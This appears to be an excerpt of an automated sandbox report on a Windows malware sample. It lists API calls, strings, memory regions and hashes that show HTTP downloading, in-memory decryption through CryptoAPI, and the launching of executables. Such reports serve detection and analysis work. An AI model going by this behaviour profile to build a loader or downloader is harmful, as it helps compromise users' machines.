                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                  • String ID: GET$http://
                                                  • API String ID: 1233269984-1632879366
                                                  • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                  • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                  • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                  APIs
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401777
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 0040179D
                                                    • Part of subcall function 00402460: Concurrency::cancel_current_task.LIBCPMT ref: 00402593
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017C3
                                                  • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017E9
                                                  Strings
                                                  • GET, xrefs: 00401F41
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004017C7
                                                  • Pazo, xrefs: 00401EBE
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017A1
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 0040177B
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401739
                                                  • text, xrefs: 00401B1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$Pazo$text
                                                  • API String ID: 2146599340-339585637
                                                  • Opcode ID: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                  • Instruction ID: dd27eeabaf9dd409a411fe115e39f4e0811eb9476ae1debadf98a18efd4bf4d9
                                                  • Opcode Fuzzy Hash: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                  • Instruction Fuzzy Hash: AF314271D00108AFDB14DFA9CC85FEEBB79EB48714F60C02AE521761D0D778A644CBA5

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0066024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 8728a758dab89e9ea64e30a78b4b1ed508de18543e59f78f2a777fecd39c5750
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 91526874A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E94DAB351DB30AE85DF14

                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                  • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                  • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                  • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                  • String ID: text
                                                  • API String ID: 1154000607-999008199
                                                  • Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                  • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                  • Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                  • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

                                                  APIs
                                                    • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                    • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: .exe$open
                                                  • API String ID: 1627157292-49952409
                                                  • Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                  • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                  • Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                  • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: http://
                                                  • API String ID: 0-1121587658
                                                  • Opcode ID: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                  • Instruction ID: 400ae1f0683e16050dc0c92ac0c9e39ab50ada623451b1719e06fb015b7fc8db
                                                  • Opcode Fuzzy Hash: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                  • Instruction Fuzzy Hash: 9551C171E002099FDB14CFA8C885BEEBBB5EF48714F20812AE811B72D1D7799945CBA4

                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020B6
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 004020D7
                                                  • CloseHandle.KERNEL32(00000000), ref: 004020DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleWrite
                                                  • String ID:
                                                  • API String ID: 1065093856-0
                                                  • Opcode ID: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                  • Instruction ID: 6c77038d191d3f97727d8eed6fdb37873f2ee397ff2ea2baf70002bfc895bc0c
                                                  • Opcode Fuzzy Hash: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                  • Instruction Fuzzy Hash: AA01DB31601204EBD730DB68DD49BAEB7A4EB48720F40413EFA45A61D0CEB46945DB98
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00660223,?,?), ref: 00660E19
                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00660223,?,?), ref: 00660E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: ee078584dca13e788e7d6e14266956c172b54066e7d8b192639a4a5066c8a46f
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 8CD0123154512877D7002A94DC09BCE7B1CDF05B62F008421FB0DD9180C771994046E5
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                  • Instruction ID: 892a2f85d179e940e32edf4c269616ac7a5d26f5bdb6421d04aa5267c10937ef
                                                  • Opcode Fuzzy Hash: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                  • Instruction Fuzzy Hash: 39E02B31643228E6D7212726AC00BDBB6499F417B0F550127FC64D2291CF6CDCD1C1AF
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                  • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                  • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                  APIs
                                                  • _free.LIBCMT ref: 0041339B
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                  • Instruction ID: 55f22833085c7284391f6abc04ff7850bc4061f265e97900bf2c914d8fb6d659
                                                  • Opcode Fuzzy Hash: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                  • Instruction Fuzzy Hash: CFC08C3110020CBBCB00DB42C806A8E7BA8DB80368F200048F40017240CAB1EE409694
                                                  APIs
                                                  • _free.LIBCMT ref: 10005C07
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                  • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00774811
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_76f000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 75346193475ec7ef146632e383a6d46e01430c9a726db5e625ea47b45e178b98
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: E3112A79A40208EFDB01DF98C989E99BBF5AB08351F0580A4F9489B362D375EA50DB80
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00402BEF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                  • Instruction ID: 757219c421bd17c9bacb0b6147dd7d19cb6d4b5150cd33f247450a4ef3d9d6e3
                                                  • Opcode Fuzzy Hash: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                  • Instruction Fuzzy Hash: B6C0483204420DFFCF025F81EC04C9E3F2AFB08260B448024FA1824030CB339931AB95
                                                  APIs
                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 00402C0C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                  • Instruction ID: 453d66be5c1bbbae9c6a98f4a0570dcf14d6ac7d0ccfee59b5e1430b94dd3887
                                                  • Opcode Fuzzy Hash: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                  • Instruction Fuzzy Hash: 56B0923200020CFBCF021F81EC0489D3F2AFB08260B448024FA1C44031CB339571AB84
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,00437018), ref: 00663797
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 006637BB
                                                  • _mbstowcs.LIBCMT ref: 0066380E
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 00663825
                                                  • GetLastError.KERNEL32 ref: 0066382F
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00663857
                                                  • GetLastError.KERNEL32 ref: 00663861
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00663871
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 00663933
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 006639A5
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00663A25
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00663773, 00663A0A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 4265767208-63410773
                                                  • Opcode ID: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                  • Instruction ID: b6497fc807aa8e6c8b8dd160c9887a5079ba5be176e1786da1b656298d3e2a55
                                                  • Opcode Fuzzy Hash: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                  • Instruction Fuzzy Hash: 4D816D71A00228AFEB209F25CC45B9EBBB6EF45310F5081A9F54DE7381EB719E848F55
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0066924B
                                                  • __Init_thread_footer.LIBCMT ref: 006694E5
                                                  • __Init_thread_footer.LIBCMT ref: 00669331
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  • __Init_thread_footer.LIBCMT ref: 006696D6
                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 006698A4
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$Init_thread_footer$EnterLeave$FileIos_base_dtorModuleNamestd::ios_base::_
                                                  • String ID: P:C$ZYA.$kc~z
                                                  • API String ID: 1348255701-279448249
                                                  • Opcode ID: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                  • Instruction ID: 1f79a84b63d58f6d006d73b39b755c6200ec92dd5aba044d414113285bc8b3dd
                                                  • Opcode Fuzzy Hash: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                  • Instruction Fuzzy Hash: D8420470A002449BDB18DF28DC99BE9B7B6BF49304F1042DCE8499B392DB71AE84CF55
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00420F54
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00417A23,?,?,?,00000055,?,-00000050,?,?), ref: 00420F7F
                                                  • _wcschr.LIBVCRUNTIME ref: 00421013
                                                  • _wcschr.LIBVCRUNTIME ref: 00421021
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004210E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID: utf8
                                                  • API String ID: 4147378913-905460609
                                                  • Opcode ID: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                  • Instruction ID: bacd77ab9f109c2ce2fb904c5d91b5ba267ea5c699df71e4fc18565647c60fab
                                                  • Opcode Fuzzy Hash: ec97581227958269d26a21896a7a43edb4bdbbe001f50202358ae53c9e406f2b
                                                  • Instruction Fuzzy Hash: F4712831700321AAD734AB35EC86BBB73E8EF54704F55442BF505D7292EABCD8818668
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: b5db4dd6549a24109d46b2c60a41c5217e0e4334f21777dec3ab2f9fc6fd95f1
                                                  • Instruction ID: 41dc3819fad2d9129b81c787e7835a844f779ca96fe732548fe2c0b5b3ddb6ba
                                                  • Opcode Fuzzy Hash: b5db4dd6549a24109d46b2c60a41c5217e0e4334f21777dec3ab2f9fc6fd95f1
                                                  • Instruction Fuzzy Hash: 2CD22871E082288FDB65CE28ED407EAB7B5EB85315F5441EBE80DE7240D778AE818F45
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216B8
                                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,0042193D,00000002,00000000,?,?,?,0042193D,?,00000000), ref: 004216E1
                                                  • GetACP.KERNEL32(?,?,0042193D,?,00000000), ref: 004216F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction ID: 8acf744a58ce8a7ab2eb5bb327c39e73a43266cf4ebd95a2e37211785a4fc039
                                                  • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction Fuzzy Hash: ED219561700125A7D7348F54E901E9F73A6AF70B50FDE8466E806C7220E77ADD41C35C
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00681BA4,00000002,00000000,?,?,?,00681BA4,?,00000000), ref: 0068191F
                                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00681BA4,00000002,00000000,?,?,?,00681BA4,?,00000000), ref: 00681948
                                                  • GetACP.KERNEL32(?,?,00681BA4,?,00000000), ref: 0068195D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction ID: 7cf2c830eb13dced599d0560a85319aa000e676f9ba4913a4f5e861da41c260a
                                                  • Opcode Fuzzy Hash: a2faa69caa5e81c2da37bdf39d5446810049368aeadd317a8cb1ef654e4cee2b
                                                  • Instruction Fuzzy Hash: 5421A772B00105AAEF34AB54D951AD773AFEF56B54B568624E90EDF200E731DE43C350
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00677C8A,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006811BB
